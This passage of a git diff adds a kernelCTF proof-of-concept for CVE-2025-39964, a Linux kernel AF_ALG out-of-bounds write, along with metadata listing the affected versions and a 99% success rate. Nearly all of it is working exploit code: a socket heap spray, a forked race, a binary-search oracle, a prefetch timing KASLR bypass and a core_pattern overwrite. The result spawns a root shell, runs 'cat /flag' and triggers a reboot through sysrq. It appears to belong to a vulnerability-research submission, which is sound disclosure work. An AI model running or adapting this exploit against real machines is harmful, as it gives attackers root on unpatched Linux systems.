+  CPU_ZERO(&mask);
+  CPU_SET(i, &mask);
+  sched_setaffinity(0, sizeof(mask), &mask);
+}
+
+/*
+ * Spray worker: repeatedly sendmsg()s the crafted 0x1000-byte msg_control
+ * buffer (payload[]) over its AF_UNIX pair so the kernel reallocates the
+ * control copy in the 4096-byte slab (ideally right before an af_alg_tsgl —
+ * see the PAYLOAD_OFFS_TARGET comment). Each round is gated by the main
+ * thread over the cfd socketpair.
+ */
+void *spray_send_thread(void *x) {
+  size_t idx = (size_t)x;
+  /* Handshake: announce readiness, then wait for the go-ahead. */
+  write(cfd[0], buf, 1);
+  read(cfd[0], buf, 1);
+  struct iovec iov = {buf, 0x1000};
+  struct msghdr mhdr = {.msg_iov = &iov,
+                        .msg_iovlen = 1,
+                        .msg_control = payload,
+                        .msg_controllen = 0x1000};
+  while (1) {
+    sendmsg(sfd[idx][1], &mhdr, 0);
+    write(cfd[0], buf, 1);
+    read(cfd[0], buf, 1);
+  }
+}
+
+/*
+ * Step 1: Spray THREAD_NUM AF_UNIX socket pairs, each sending a crafted msghdr
+ * whose msg_control buffer (payload[]) will occupy the heap slot immediately
+ * preceding an af_alg_tsgl allocation. payload[PAYLOAD_OFFS_TARGET] then
+ * aliases sg[-1].page_link and controls the OOB write destination.
+ */
+void spray_unix_sockets() {
+  memset(payload, 'a', 0x1000);
+  struct cmsghdr *first;
+  first = (struct cmsghdr *)payload;
+  first->cmsg_len = 0x1000;
+  first->cmsg_level =
+      0; /* must differ from SOL_SOCKET=1 to skip cmsg processing */
+  first->cmsg_type = 0x41414141; /* dummy filler value */
+  /* Initially zero; the binary search will update this to guide the OOB write
+   */
+  *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = 0;
+
+  for (int i = 0; i < THREAD_NUM; i++) {
+    SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, sfd[i]));
+    /* NOTE(review): SO_SNDBUF/SO_RCVBUF = 0x800 plus the 0x1000-byte priming
+     * write presumably keeps each pair full so the spray threads block
+     * between rounds — confirm against af_unix buffer accounting. */
+    int n = 0x800;
+    setsockopt(sfd[i][1], SOL_SOCKET, SO_SNDBUF, (char *)&n, sizeof(n));
+    setsockopt(sfd[i][0], SOL_SOCKET, SO_RCVBUF, (char *)&n, sizeof(n));
+    write(sfd[i][1], buf, 0x1000);
+  }
+
+  for (int i = 0; i < THREAD_NUM; i++)
+    pthread_create(&tid[i], 0, spray_send_thread, (void *)(size_t)i);
+
+  /* Wait for every worker's readiness byte before returning. */
+  for (int i = 0; i < THREAD_NUM; i++)
+    read(cfd[1], buf, 1);
+}
+
+/*
+ * Step 5a: Map the full userspace range [SCAN_START_ADDR, SCAN_END_ADDR) with
+ * physical pages in MAP_CHUNK_SIZE (2 GB) chunks. When sg[-1].page_link is
+ * crafted with a value near 0, the kernel's page_address() computation wraps
+ * around and the OOB write destination lands somewhere within this region.
+ * Mapping real pages here means the write silently succeeds (our oracle),
+ * letting us binary-search for the exact physical page by progressively
+ * munmap-ing halves of this range.
+ */
+void allocate_map() {
+  char *start = (void *)SCAN_START_ADDR;
+  while (1) {
+    /* MAP_FIXED carpets the range deterministically, one 2 GB chunk at a
+     * time; SYSCHK aborts if any chunk cannot be placed. */
+    start = SYSCHK(mmap(start, MAP_CHUNK_SIZE, PROT_READ | PROT_WRITE,
+                        MAP_SHARED | MAP_ANON | MAP_FIXED, -1, 0));
+    start += MAP_CHUNK_SIZE;
+    if ((size_t)start >= SCAN_END_ADDR)
+      break;
+  }
+}
+
+/*
+ * Step 5b: Use mincore to find the exact virtual address in [start, start+4GB)
+ * that corresponds to the physical page the OOB write targets. A page marked
+ * resident (mincore bit = 1) that also contains our spray marker ('a') is the
+ * hit: it is the page that the kernel's arbitrary-write wrote into.
+ */
+size_t search_offset(char *start) {
+  char *pvec = NULL;
+  for (int i = 0; i < MAX_SCAN_ITERATIONS; i++) {
+    /* 4 GB window / 0x1000-byte pages = 0x100000 mincore entries in vec[]. */
+    mincore((void *)start, 0x100000000ULL, vec);
+    pvec = memchr(vec, 1, 0x100000);
+    if (pvec) {
+      char *leak_offset = start + (pvec - vec) * 0x1000;
+      /* Confirm the resident page actually holds the written marker byte. */
+      pvec = memchr((void *)leak_offset, 'a', 0x1000);
+      if (pvec)
+        break;
+    }
+    start += 0x100000000ULL;
+  }
+  /* No hit anywhere: abandon this attempt; the parent retry loop restarts. */
+  if (pvec == NULL)
+    exit(0);
+  printf("\npvec %p %x\n", pvec, pvec[0]);
+  return (size_t)pvec;
+}
+
+/*
+ * Poll helper: returns nonzero once /proc/sys/kernel/core_pattern begins
+ * with our "|/proc/%P/fd/666" payload, i.e. the OOB write has landed.
+ */
+int check_core() {
+  char current[0x100] = {};
+  int fd = open("/proc/sys/kernel/core_pattern", O_RDONLY);
+  read(fd, current, sizeof(current));
+  close(fd);
+  return !strncmp(current, "|/proc/%P/fd/666", 0x10);
+}
+
+/*
+ * Step 7 worker: stage our own binary at fd 666 (the path named in the
+ * core_pattern string), wait for check_core() to report the overwrite, then
+ * NULL-deref so the kernel runs the core_pattern pipe handler as root.
+ * @param cmd unused (kept for the existing call site).
+ */
+void crash(char *cmd) {
+  int memfd = memfd_create("", 0);
+  /* send our binary to memfd for core_pattern payload */
+  SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff));
+  /* our binary now at file descriptor 666 */
+  dup2(memfd, 666);
+  close(memfd);
+  while (check_core() == 0)
+    sleep(1);
+  puts("Root shell !!");
+  /* Trigger program crash and cause kernel to execute program from core_pattern
+   * which is our "root" binary */
+  *(size_t *)0 = 0;
+}
+
+size_t bypass_kaslr(u64 base);
+
+/*
+ * Binary-search oracle probe ("guesss" is the original's spelling of guess):
+ * drain each spray socket so its worker will resend, patch the candidate
+ * page_link into payload[], release the workers so the kernel re-copies the
+ * control buffer, then attempt a 1-byte OOB write.
+ * Returns 1 iff send() reported success, i.e. the write destination for this
+ * candidate was mapped.
+ */
+int guess_addr(size_t guesss) {
+  for (int i = 0; i < THREAD_NUM; i++) {
+    read(sfd[i][0], buf, 0x1000);
+    read(cfd[1], buf, 1);
+  }
+  *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = guesss;
+  write(cfd[1], buf, 0x100);
+  buf[0] = 'b';
+  int x = send(opfd, buf, 1, MSG_MORE);
+  printf("x: %d\n", x);
+  return x == 1;
+}
+
+int trigger_exploit();
+/*
+ * Entry point. Two personalities:
+ *  - argc == 1: the exploit proper — resolve KASLR (KTEXT env override or
+ *    prefetch side channel), fork the core_pattern watcher, then retry
+ *    trigger_exploit() in child processes until the race lands.
+ *  - argc > 1: we were re-executed by the kernel as the core_pattern pipe
+ *    handler (root); argv[1] is the crashing pid — steal its stdio via
+ *    pidfd_getfd and dump /flag.
+ */
+int main(int argc, char **argv) {
+
+  setvbuf(stdin, 0, 2, 0);
+  setvbuf(stdout, 0, 2, 0);
+  puts("Exploit start");
+  if (argc == 1) {
+    size_t stext = 0;
+    if (getenv("KTEXT"))
+      stext = strtoull(getenv("KTEXT"), 0, 16);
+    else
+      stext = bypass_kaslr(0);
+    /* core_pattern symbol is at a fixed offset from _stext */
+    core_pattern = stext + CORE_PATTERN_MIT_OFFSET;
+    printf("got stext 0x%zx 0x%zx\n", stext, core_pattern);
+  }
+
+  /* Raise the fd limit so dup2(…, 666) and the socket spray cannot fail. */
+  struct rlimit rlim = {.rlim_cur = 0xf000, .rlim_max = 0xf000};
+  setrlimit(RLIMIT_NOFILE, &rlim);
+
+  if (argc > 1) {
+/* NOTE(review): SYS_pidfd_getfd is already defined at the top of the file;
+ * this identical redefinition is redundant but harmless. */
+#define SYS_pidfd_getfd 438
+    int pid = strtoull(argv[1], 0, 10);
+    int pfd = syscall(SYS_pidfd_open, pid, 0);
+    int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
+    int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
+    int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
+    dup2(stdinfd, 0);
+    dup2(stdoutfd, 1);
+    dup2(stderrfd, 2);
+    /* Run cat /flag multiple times to ensure output is flushed before reboot */
+    for (int i = 0; i < 6; i++)
+      system("cat /flag");
+
+    system("cat /flag;echo o>/proc/sysrq-trigger");
+    execlp("bash", "bash", NULL);
+  }
+  /* Step 7: fork a watcher that polls core_pattern and triggers crash once
+   * overwritten */
+  if (fork() == 0) {
+    set_cpu(0);
+    setsid();
+    crash("");
+  }
+  /* Retry loop: trigger_exploit() may fail the race; restart on failure */
+  while (1) {
+    if (fork() == 0) {
+      trigger_exploit();
+      exit(0);
+    }
+    wait(NULL);
+  }
+}
+
+/*
+ * One full exploit attempt (Steps 1–6 of the chain described in the file
+ * header). Returns 0 after queuing the core_pattern overwrite; failure paths
+ * exit(0) so the retry loop in main() can start a fresh child process.
+ */
+int trigger_exploit() {
+  int tfmfd;
+
+  set_cpu(1);
+  SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, cfd));
+
+  /* Step 1: spray heap with crafted msg_control buffers */
+  spray_unix_sockets();
+
+  /* NOTE(review): addr/local/remote are never used below — likely leftovers
+   * from a process_vm_readv variant (see the SYS_process_vm_readv define). */
+  char *addr = SYSCHK(mmap(0, MMAP_REGION_LEN, PROT_READ | PROT_WRITE,
+                           MAP_PRIVATE | MAP_ANON, -1, 0));
+  struct iovec local = {.iov_base = addr, .iov_len = MMAP_REGION_LEN};
+  struct iovec remote = {.iov_base = addr, .iov_len = MMAP_REGION_LEN};
+
+  struct sockaddr_alg sa = {
+      .salg_family = AF_ALG,
+      .salg_type = "skcipher", /* symmetric key cipher */
+      .salg_name = "cbc(aes)", /* AES in CBC mode */
+  };
+
+  /* Step 2: create and bind the AF_ALG transformation socket */
+  tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0);
+  if (tfmfd == -1) {
+    perror("socket");
+    return 1;
+  }
+
+  if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) != 0) {
+    perror("bind");
+    close(tfmfd);
+    return 1;
+  }
+
+  unsigned char key[32] = {0};
+  if (setsockopt(tfmfd, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) != 0) {
+    perror("setsockopt");
+    close(tfmfd);
+    return 1;
+  }
+
+  opfd = accept(tfmfd, NULL, 0);
+  if (opfd == -1) {
+    perror("accept");
+    close(tfmfd);
+    return 1;
+  }
+
+  /* SO_SNDBUF value applied once the sgl is nearly full (see below). */
+  int val = 0x1000;
+
+  struct {
+    struct cmsghdr cmsg;
+    __u32 op;
+    __u32 ivlen;
+    unsigned char iv[16];
+  } __attribute__((__packed__)) msg;
+
+  memset(&msg, 0, sizeof(msg));
+  msg.cmsg.cmsg_level = SOL_ALG;
+  msg.cmsg.cmsg_type = ALG_SET_OP;
+  msg.cmsg.cmsg_len = CMSG_LEN(sizeof(__u32) + sizeof(__u32) + 16);
+
+  msg.op = ALG_OP_ENCRYPT;
+  msg.ivlen = 16;
+  memset(msg.iv, 0x01, 16);
+
+  struct iovec iov = {
+      .iov_base = buf,
+      .iov_len = 0x1000,
+  };
+
+  struct msghdr msgh;
+  memset(&msgh, 0, sizeof(msgh));
+  msgh.msg_iov = &iov;
+  msgh.msg_iovlen = 1;
+  msgh.msg_control = &msg;
+  msgh.msg_controllen = msg.cmsg.cmsg_len;
+
+  /* Step 3: initial sendmsg to initialise the tsgl; advances sgl->cur to 1 */
+  ssize_t n = sendmsg(opfd, &msgh, MSG_MORE);
+  printf("init %ld\n", n);
+
+  /*
+   * Step 3 (cont): advance sgl->cur from 1 to 124 (MAX_SGL_ENTS - 2) using
+   * SGL_MERGE_ITERATIONS = 0x7b send+recv pairs. Each send allocates one sg
+   * entry (cur++); each recv drains the processed entry so the socket stays
+   * writable. The loop comment in the original PR is:
+   *   "the loop with 0x7b + the sendmsg and send calls executes 125 times,
+   * matching MAX_SGL_ENTS - 1 = 126 - 1 = 125."
+   */
+  for (int i = 0; i < SGL_MERGE_ITERATIONS; i++) {
+    SYSCHK(send(opfd, buf, 0x1000, MSG_MORE));
+    n = recv(opfd, buf, 0x1000, 0);
+  }
+
+  /* Advance sgl->cur to 125 = MAX_SGL_ENTS - 1 (one slot before the list is
+   * full) */
+  send(opfd, buf, 0x1000, MSG_MORE);
+  SYSCHK(setsockopt(opfd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val)));
+  printf("setsockopt done\n");
+
+  /*
+   * Step 3 (race): fork two children that race each other:
+   *
+   * Child A (send invalid addr): passes INVALID_USER_ADDR, which causes
+   * af_alg_alloc_tsgl() to allocate a new tsgl (sgl->cur → 0) then fail
+   * in memcpy_from_msg() — leaving ctx->merge = 1 and sgl->cur = 0.
+   *
+   * Child B (send 0x200 bytes): sends a sub-page-size buffer so that
+   * ctx->merge is set to 1 and sgl->cur advances to MAX_SGL_ENTS = 126.
+   *
+   * Desired outcome: both children finish such that ctx->merge == 1 AND the
+   * last tsgl has sgl->cur == 0. The next send() will then use sg[-1].
+   */
+  if (fork() == 0) {
+    /* Child A: trigger new-tsgl allocation then fail — sets sgl->cur = 0 */
+    int x = send(opfd, INVALID_USER_ADDR, 0x400, MSG_MORE);
+    printf("send3 %d\n", x);
+    exit(0);
+  }
+
+  if (fork() == 0) {
+    /* Child B: sub-page send sets ctx->merge = 1 and fills sgl->cur to
+     * MAX_SGL_ENTS */
+    int x = send(opfd, buf, 0x200, MSG_MORE);
+    printf("send2 %d\n", x);
+    exit(0);
+  }
+
+  /*
+   * @sleep(desc="wait for both fork children to reach their send() calls and
+   * set ctx->merge=1 with sgl->cur=0 before we recv()")
+   */
+  sleep(1);
+  n = recv(opfd, buf, 0x1000, 0);
+  printf("recv2 %ld\n", n);
+  wait(NULL);
+
+  /* Step 4: release spray threads so they re-send their crafted payloads */
+  for (int i = 0; i < THREAD_NUM; i++) {
+    write(cfd[1], buf, 1);
+  }
+
+  n = recv(opfd, buf, 0x1000, 0);
+  printf("recv2 %ld\n", n);
+
+  memset(buf, 'z', 0x1000);
+  wait(NULL);
+
+  /* Step 5: map userspace oracle region for the binary search */
+  allocate_map();
+
+  /* Step 5 (OOB trigger): with ctx->merge=1 and sgl->cur=0 this send uses
+   * sg[-1].page_link from our sprayed payload — triggering the OOB write.
+   * Returns -1 if the write destination is unmapped (race failed); 1 if mapped.
+   */
+  int x = send(opfd, buf, 1, MSG_MORE);
+
+  if (x == 1) {
+    puts("Race fail");
+    exit(0);
+  }
+
+  /*
+   * Step 5 (binary search oracle):
+   *
+   * Background:
+   *   sg[-1].page_link is effectively a pointer to a struct page in vmemmap.
+   *   The kernel computes the write destination as:
+   *     dest = page_address(sg_page(sg)) + sg->offset + sg->length
+   *          = page_offset_base + (page_link - vmemmap_base) / 64 * PAGE_SIZE
+   *            + offset + length
+   *   With page_link ≈ 0, the pfn arithmetic wraps to a very large value, and
+   *   (page_offset_base + pfn * PAGE_SIZE) wraps further to land within our
+   *   userspace oracle region [SCAN_START_ADDR, SCAN_END_ADDR).
+   *
+   * Oracle:
+   *   send() returns 1 → the write destination is in a mapped page (success).
+   *   send() returns -1 → the destination is unmapped (copy_from_user failed).
+   *   By progressively munmap-ing halves of the oracle region we can determine
+   *   which physical page corresponds to the OOB write target.
+   *
+   * Binary search (8 iterations → narrows range from SCAN_END_ADDR to ~340 MB):
+   *   Each iteration j tests: "if I decrease page_link by half_range/64, does
+   *   the write still succeed?"
+   *   - Decreasing page_link by Δ shifts dest by Δ*64 bytes (since each
+   *     struct-page unit = 64 bytes = one PAGE_SIZE/64 step in physmap).
+   *   - The test delta (SCAN_END_ADDR >> (7+j)) in page_link units equals
+   *     half_range = (SCAN_END_ADDR >> (1+j)) in dest-address units.
+   *   If the shifted oracle still succeeds → dest is in the *upper* half →
+   *     unmap the lower half and advance start.
+   *   Otherwise → dest is in the *lower* half → unmap the upper half.
+   */
+  size_t oracle;
+  size_t leak_offset = 0;
+  int xcnt = 0;
+  for (int k = 0; k < MAX_SCAN_ITERATIONS; k++) {
+    for (int i = 0; i < THREAD_NUM; i++) {
+      read(sfd[i][0], buf, 0x1000);
+      read(cfd[1], buf, 1);
+    }
+    *(size_t *)&payload[PAYLOAD_OFFS_TARGET] -= (SCAN_END_ADDR >> 6);
+    write(cfd[1], buf, 0x100);
+    buf[0] = 'a';
+    x = send(opfd, buf, 1, MSG_MORE);
+    if (x == 1) {
+      puts("");
+      xcnt++;
+      oracle = *(size_t *)&payload[PAYLOAD_OFFS_TARGET];
+      char *start = (void *)(0ULL);
+      for (int j = 0; j < 8; j++) {
+        printf("loop j: %d\n", j);
+        x = guess_addr(oracle - (SCAN_END_ADDR >> (7 + j)));
+        if (x == 1) {
+          xcnt++;
+          start += (SCAN_END_ADDR >> (1 + j)); /* upper half */
+          munmap(start - (SCAN_END_ADDR >> (1 + j)),
+                 (SCAN_END_ADDR >> (1 + j)));
+        } else {
+          munmap(start + (SCAN_END_ADDR >> (1 + j)),
+                 (SCAN_END_ADDR >> (1 + j)));
+        }
+      }
+      *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle;
+      /* search_offset returns the exact userspace VA of the OOB-written page */
+      leak_offset = search_offset(start) + xcnt;
+      printf("leak_offset %zx\n", leak_offset);
+      printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]);
+
+      break;
+    }
+  }
+
+  if (leak_offset == 0)
+    exit(0);
+
+  for (int i = 0; i < THREAD_NUM; i++) {
+    read(sfd[i][0], buf, 0x1000);
+    read(cfd[1], buf, 1);
+  }
+  *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle;
+  write(cfd[1], buf, 0x100);
+
+  /*
+   * Step 6: redirect the OOB write to core_pattern.
+   *
+   * leak_offset is the VA of the currently-targeted physical page.
+   * core_pattern is the KASLR-adjusted kernel VA of core_pattern[].
+   *
+   * First, align within-page: send adjust_offset bytes so that after the
+   * advance the write starts at the same within-page offset as core_pattern.
+   */
+  size_t adjust_offset =
+      PAGE_SIZE + (core_pattern & PAGE_MASK) - (leak_offset & PAGE_MASK);
+  leak_offset += adjust_offset;
+
+  memset(buf, 'z', 0x1000);
+  SYSCHK(send(opfd, buf, adjust_offset - 1, MSG_MORE));
+  SYSCHK(send(opfd, buf, 1, MSG_MORE));
+
+  /* NOTE(review): if the 'z' marker did not land at leak_offset-1 the write
+   * cursor presumably crossed a 4 GB boundary; the compensation below backs
+   * leak_offset off by 0x100000000 — confirm against sg->length wrapping. */
+  printf("sg->len overflow check %x\n", *(char *)(leak_offset - 1));
+  if (*(char *)(leak_offset - 1) != 'z')
+    leak_offset -= 0x100000000ULL;
+
+  for (int i = 0; i < THREAD_NUM; i++) {
+    read(sfd[i][0], buf, 0x1000);
+    read(cfd[1], buf, 1);
+  }
+
+  /*
+   * Now adjust payload[PAYLOAD_OFFS_TARGET] (= sg[-1].page_link) so that
+   * page_address(sg_page(sg)) points to the physical page holding core_pattern.
+   * The >> 6 (or / 64) is actually a simplification of the formula
+   * (addr / 0x1000) * 64. We divide the address by 0x1000 to find the page
+   * index, and then multiply by 64 because each memory page has a page_struct
+   * that is exactly 64 bytes long.
+   * payload[PAYLOAD_OFFS_TARGET] is sg[-1].page_link, which controls dest via
+   * the formula described in the binary search comment above.
+   */
+
+  *(size_t *)&payload[PAYLOAD_OFFS_TARGET] +=
+      (((core_pattern & ~0xfff) - (leak_offset & ~0xfff)) >> 6);
+
+  printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]);
+  write(cfd[1], buf, 0x100);
+  /* Step 6 (write): send the core_pattern string; kernel copies it to
+   * core_pattern[] */
+  char mcore[64] = "|/proc/%P/fd/666 %P";
+  SYSCHK(send(opfd, mcore, 64, MSG_MORE));
+  PAUSE;
+
+  return 0;
+}
+
+/*
+ * Serialized TSC read opening a timing window: mfence + RDTSCP order the
+ * counter read after prior memory ops; the trailing lfence keeps the probed
+ * access from starting early. Returns the full 64-bit TSC (EDX:EAX
+ * recombined below).
+ */
+inline __attribute__((always_inline)) uint64_t rdtsc_begin() {
+  uint64_t a, d;
+  asm volatile("mfence\n\t"
+               "RDTSCP\n\t"
+               "mov %%rdx, %0\n\t"
+               "mov %%rax, %1\n\t"
+               "xor %%rax, %%rax\n\t"
+               "lfence\n\t"
+               : "=r"(d), "=r"(a)
+               :
+               : "%rax", "%rbx", "%rcx", "%rdx");
+  a = (d << 32) | a;
+  return a;
+}
+
+/*
+ * Serialized TSC read closing a timing window: the leading lfence waits for
+ * the probed access to retire before RDTSCP samples the counter; mfence
+ * fences subsequent stores. Returns the full 64-bit TSC.
+ */
+inline __attribute__((always_inline)) uint64_t rdtsc_end() {
+  uint64_t a, d;
+  asm volatile("xor %%rax, %%rax\n\t"
+               "lfence\n\t"
+               "RDTSCP\n\t"
+               "mov %%rdx, %0\n\t"
+               "mov %%rax, %1\n\t"
+               "mfence\n\t"
+               : "=r"(d), "=r"(a)
+               :
+               : "%rax", "%rbx", "%rcx", "%rdx");
+  a = (d << 32) | a;
+  return a;
+}
+
+/*
+ * Issue a prefetchnta + prefetcht2 pair against @p. Prefetches do not fault
+ * on kernel addresses; their latency (measured by flushandreload) is the
+ * side-channel signal used by bypass_kaslr.
+ */
+void prefetch(void *p) {
+  asm volatile("prefetchnta (%0)\n"
+               "prefetcht2 (%0)\n"
+               :
+               : "r"(p));
+}
+
+/*
+ * Time one prefetch pair against @addr between the serialized TSC reads and
+ * return the elapsed cycle delta. bypass_kaslr compares these deltas across
+ * candidate addresses to find the kernel text mapping.
+ */
+size_t flushandreload(void *addr) /* row miss */
+{
+  size_t time = rdtsc_begin();
+  prefetch(addr);
+  size_t delta = rdtsc_end() - time;
+  return delta;
+}
+
+/*
+ * KASLR bypass via Flush+Reload side channel.
+ *
+ * Uncomment KASLR_BYPASS_INTEL for Intel CPUs (kernelCTF remote instances).
+ * Keep commented for GitHub CI (AMD/other) to use the sliding-window variant.
+ * Alternatively pass -DKASLR_BYPASS_INTEL to the compiler without touching
+ * source.
+ */
+// #define KASLR_BYPASS_INTEL
+size_t bypass_kaslr(u64 base) {
+  /*
+   * Derive the randomized kernel text base by timing prefetches against
+   * candidate addresses (STEP-spaced in [START, END)) and majority-voting
+   * across trials. If @base is already nonzero it is returned unchanged.
+   */
+  if (!base) {
+#ifdef KASLR_BYPASS_INTEL
+#define OFFSET 0
+#define START (0xffffffff81000000ull + OFFSET)
+#define END (0xffffffffD0000000ull + OFFSET)
+#define STEP 0x0000000001000000ull
+    while (1) {
+      u64 bases[7] = {0};
+      for (int vote = 0; vote < ARRAY_LEN(bases); vote++) {
+        size_t times[(END - START) / STEP] = {};
+        uint64_t addrs[(END - START) / STEP];
+
+        for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+          times[ti] = ~0;
+          addrs[ti] = START + STEP * (u64)ti;
+        }
+
+        /* Keep the minimum latency seen per candidate over 16 rounds. */
+        for (int i = 0; i < 16; i++) {
+          for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+            u64 addr = addrs[ti];
+            size_t t = flushandreload((void *)addr);
+            if (t < times[ti]) {
+              times[ti] = t;
+            }
+          }
+        }
+
+        size_t minv = ~0;
+        /*
+         * FIX: mini was declared size_t, so "mini < 0" below could never be
+         * true and a stale (size_t)-1 would have indexed addrs[] out of
+         * bounds if no candidate beat minv. A signed type keeps the -1
+         * "no candidate" sentinel meaningful.
+         */
+        long mini = -1;
+        for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) {
+          if (times[ti] < minv) {
+            mini = ti;
+            minv = times[ti];
+          }
+        }
+
+        if (mini < 0) {
+          return -1;
+        }
+
+        bases[vote] = addrs[mini];
+      }
+
+      /* Boyer-Moore majority vote over the per-trial winners. */
+      int c = 0;
+      for (int i = 0; i < ARRAY_LEN(bases); i++) {
+        if (c == 0) {
+          base = bases[i];
+        } else if (base == bases[i]) {
+          c++;
+        } else {
+          c--;
+        }
+      }
+
+      /* Verify the candidate really has an absolute majority; retry if not. */
+      c = 0;
+      for (int i = 0; i < ARRAY_LEN(bases); i++) {
+        if (base == bases[i]) {
+          c++;
+        }
+      }
+      if (c > ARRAY_LEN(bases) / 2) {
+        base -= OFFSET;
+        goto got_base;
+      }
+
+      printf("majority vote failed:\n");
+      printf("base = %llx with %d votes\n", base, c);
+    }
+#else
+#define START (0xffffffff81000000ull)
+#define END (0xffffffffc0000000ull)
+#define STEP 0x0000000000200000ull
+#define NUM_TRIALS 9
+/* largest contiguous mapped area at the beginning of _stext */
+#define WINDOW_SIZE 11
+
+    while (1) {
+      u64 bases[NUM_TRIALS] = {0};
+
+      for (int vote = 0; vote < ARRAY_LEN(bases); vote++) {
+        size_t times[(END - START) / STEP] = {};
+        uint64_t addrs[(END - START) / STEP];
+
+        for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+          times[ti] = ~0;
+          addrs[ti] = START + STEP * (u64)ti;
+        }
+
+        /* Keep the minimum latency seen per candidate over 16 rounds. */
+        for (int i = 0; i < 16; i++) {
+          for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+            u64 addr = addrs[ti];
+            size_t t = flushandreload((void *)addr);
+            if (t < times[ti]) {
+              times[ti] = t;
+            }
+          }
+        }
+
+        /* Sliding window: pick the WINDOW_SIZE run with the largest summed
+         * latency. */
+        uint64_t max = 0;
+        int max_i = 0;
+        for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) {
+          uint64_t sum = 0;
+          for (int i = 0; i < WINDOW_SIZE; i++) {
+            sum += times[ti + i];
+          }
+          if (sum > max) {
+            max = sum;
+            max_i = ti;
+          }
+        }
+
+        bases[vote] = addrs[max_i];
+      }
+
+      /* Boyer-Moore majority vote over the per-trial winners. */
+      int c = 0;
+      for (int i = 0; i < ARRAY_LEN(bases); i++) {
+        if (c == 0) {
+          base = bases[i];
+        } else if (base == bases[i]) {
+          c++;
+        } else {
+          c--;
+        }
+      }
+
+      /* Verify the candidate really has an absolute majority; retry if not. */
+      c = 0;
+      for (int i = 0; i < ARRAY_LEN(bases); i++) {
+        if (base == bases[i]) {
+          c++;
+        }
+      }
+      if (c > ARRAY_LEN(bases) / 2) {
+        goto got_base;
+      }
+
+      printf("majority vote failed:\n");
+      printf("base = %llx with %d votes\n", base, c);
+    }
+#endif
+  }
+
+got_base:
+
+  printf("using kernel base %llx\n", base);
+
+  return base;
+}
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/metadata.json
new file mode 100644
index 000000000..304179dc7
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/metadata.json
@@ -0,0 +1,34 @@
+{
+ "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json",
+ "submission_ids": [ "exp413","exp415"],
+ "vulnerability": {
+ "cve": "CVE-2025-39964",
+ "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1b34cbbf4f011a121ef7b2d7d6e6920a036d5285",
+ "affected_versions": ["2.6.36 - 6.16"],
+ "requirements": {
+ "attack_surface": [],
+ "capabilities": [],
+ "kernel_config": ["CONFIG_CRYPTO_USER_API"]
+ }
+ },
+ "exploits": {
+ "lts-6.12.44": {
+ "environment": "lts-6.12.44",
+ "uses": [],
+ "requires_separate_kaslr_leak": false,
+ "stability_notes": "99% success rate"
+ },
+ "mitigation-v4-6.6": {
+ "environment": "mitigation-v4-6.6",
+ "uses": [],
+ "requires_separate_kaslr_leak": false,
+ "stability_notes": "99% success rate"
+ },
+ "cos-121-18867.199.28": {
+ "environment": "cos-121-18867.199.28",
+ "uses": [],
+ "requires_separate_kaslr_leak": false,
+ "stability_notes": "99% success rate"
+ }
+ }
+}
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp413.tar.gz b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp413.tar.gz
new file mode 100755
index 000000000..07252dbed
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp413.tar.gz differ
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp415.tar.gz b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp415.tar.gz
new file mode 100755
index 000000000..07252dbed
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp415.tar.gz differ